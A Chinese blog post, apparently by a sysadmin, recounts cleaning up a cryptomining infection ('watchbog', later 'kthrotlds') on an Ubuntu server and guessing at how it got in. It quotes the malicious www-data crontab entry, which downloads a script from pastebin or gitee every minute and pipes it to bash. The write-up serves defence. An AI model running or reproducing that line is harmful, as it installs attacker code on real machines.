今天有同事说某服务器cpu占用达到了 100% 希望协助解决,查看了一下问题
首先通过htop查看了服务器状态,很明显一个叫做watchbog的进程占据了99%的 cpu资源
htop截图
然后尝试通过kill 命令杀死该进程,但是该进程很快又重新启动
尝试在文件中搜索watchbog文件,但是并没有发现该文件,进程名应该是重写的
该进程的用户是 www-data ,疑似该账户发生了问题,于是查看该账户的crontab列表,初步找到了问题
root@VM-38-99-ubuntu:/home/ubuntu# crontab -u www-data -l
*/1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- https://pastebin.com/raw/aGTSGJJp||curl -fsSL https://gitee.com/but_ter/w1/raw/master/src/phone||wget -q -O - https://gitee.com/but_ter/w1/raw/master/src/phone)|bash > /dev/null 2>&1
编辑该用户的crontab并删除该定时任务,然后再kill进程
crontab -u www-data -e
问题初步解决,但是服务器是怎么被入侵的呢?
root@VM-38-99-ubuntu:/home/ubuntu# ps aux | grep www-data
www-data 1297 0.0 0.4 359140 8072 ? S 09:50 0:00 php-fpm: pool www
www-data 1298 0.0 0.4 359140 8072 ? S 09:50 0:00 php-fpm: pool www
root 12394 0.0 0.0 14972 940 pts/0 S+ 11:09 0:00 grep --color=auto www-data
可以看到www-data 用户相关的进程有php-fmp,那么我们先把问题锁定在这里
又查看了nginx相关的配置也是使用该用户执行的(nginx最近未启动),但是并没有发现什么问题
先给出一个治标不治本的方法吧
vim /etc/cron.deny
将www-data添加到该文件中去,禁止该用户配置crontab
问题临时解决了,可是过了半个月问题又复发了,而且还更加高级了
云服务器一直发送木马警告,诡异的事情是,在云管理后台看到cpu的资源占用已经达到了100%,可是登录主机htop查看却一切如常,ps aux 一下,发下了一个叫做 kthrotlds 可疑程序正在运行,百度一下还真是一个挖矿木马。好在有好心人提供了一键杀毒脚本,在此感谢
https://github.com/MoreSecLab/DDG_MalWare_Clean_Tool
网友评论